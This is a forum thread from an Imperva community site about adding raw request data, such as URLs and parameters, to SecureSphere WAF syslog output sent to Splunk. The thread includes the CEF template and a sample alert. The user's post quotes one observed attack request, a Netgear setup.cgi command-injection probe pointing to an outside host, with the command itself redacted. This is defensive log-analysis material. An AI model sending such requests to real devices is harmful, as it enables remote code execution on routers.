Imperva Cyber Community

communities_1.jpg
 View Only
Expand all | Collapse all

Is it possible to add raw data (user's request) to syslog or exported csv file?

  • 1.  Is it possible to add raw data (user's request) to syslog or exported csv file?

    Posted 01-23-2023 02:21
    hello?

    I'm sending detection events from securesphere to splunk using syslog.

    The syslog settings are:

    CEF:0|Imperva Inc.|SecureSphere|${SecureSphereVersion}|${Alert.alertType}|#cefEscapeMessage(${Alert.alertMetadata.alertName})|${Alert.severity}|act=${Alert.immediateAction} dst=${Event.destInfo.serverIp} dpt=${Event.destInfo.serverPort} duser=#cefEscapeExtension(${Alert.username}) src=${Event.sourceInfo.sourceIp} spt=${Event.sourceInfo.sourcePort} proto=${Event.sourceInfo.ipProtocol} rt=#arcsightDate(${Alert.createTime}) cat=Alert cs1=#cefEscapeExtension(${Rule.parent.displayName}) cs1Label=Policy cs2=#cefEscapeExtension(${Alert.serverGroupName}) cs2Label=ServerGroup cs3=#cefEscapeExtension(${Alert.serviceName}) cs3Label=ServiceName cs4=#cefEscapeExtension(${Alert.applicationName}) cs4Label=ApplicationName cs5=#cefEscapeExtension(${Alert.description}) cs5Label=Description

    The logs received from splunk are:

    10.10.10.10 CEF:0|Imperva Inc.|SecureSphere|13.6.0|Protocol|Illegal Parameter Encoding|Low|act=None dst=20.20.20.20 dpt=80 duser=n/a src=45.146.165.129 spt=53387 proto=TCP rt=2023/01/21 17:51:05/08/30 14:48:37 cat=Alert cs1=HTTP/1.x Protocol Policy cs1Label=Policy cs2=Server_Zone_2 cs2Label=ServerGroup cs3=Service_Zone_2 cs3Label=ServiceName cs4=Default Web Application cs4Label=ApplicationName cs5="Multiple Nuclei Scanner(+)" cs5Label=Description


    When analyzing an attack, this information is sometimes lacking.

    Actually securesphere logs more information like url, parameter, header.

    GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=[attack command]http://30.30.30.30:45537/~~~~   HTTP/1.0

    If the above information were included in the syslog, the analysis would be much more helpful.

    I wonder if such a setup is currently possible in securesphere.

    If I can't do it via syslog, is there another way? Exporting the detection log to csv did not confirm this information.

    I look forward to your reply.

    thank you.
    #On-PremisesWAF(formerlySecuresphere)

    ------------------------------
    Seungyeon han
    ceo
    Yeungnam University College
    Seoul
    ------------------------------


  • 2.  RE: Is it possible to add raw data (user's request) to syslog or exported csv file?

    Posted 01-23-2023 10:17
    You can add those fields by customizing the syslog output. What you are looking for is the placeholders to add the needed values.

    Please reference these two documentations :

    1. v14.x Standard Placeholders
    2. v13.6 Standard Placeholders (File says DAM but it includes WAF placeholders)


    ------------------------------
    Sarvesh Lad
    Tech Lead @ On-Prem Managed Services (WAF, DAM, DRA & Sonar)
    ------------------------------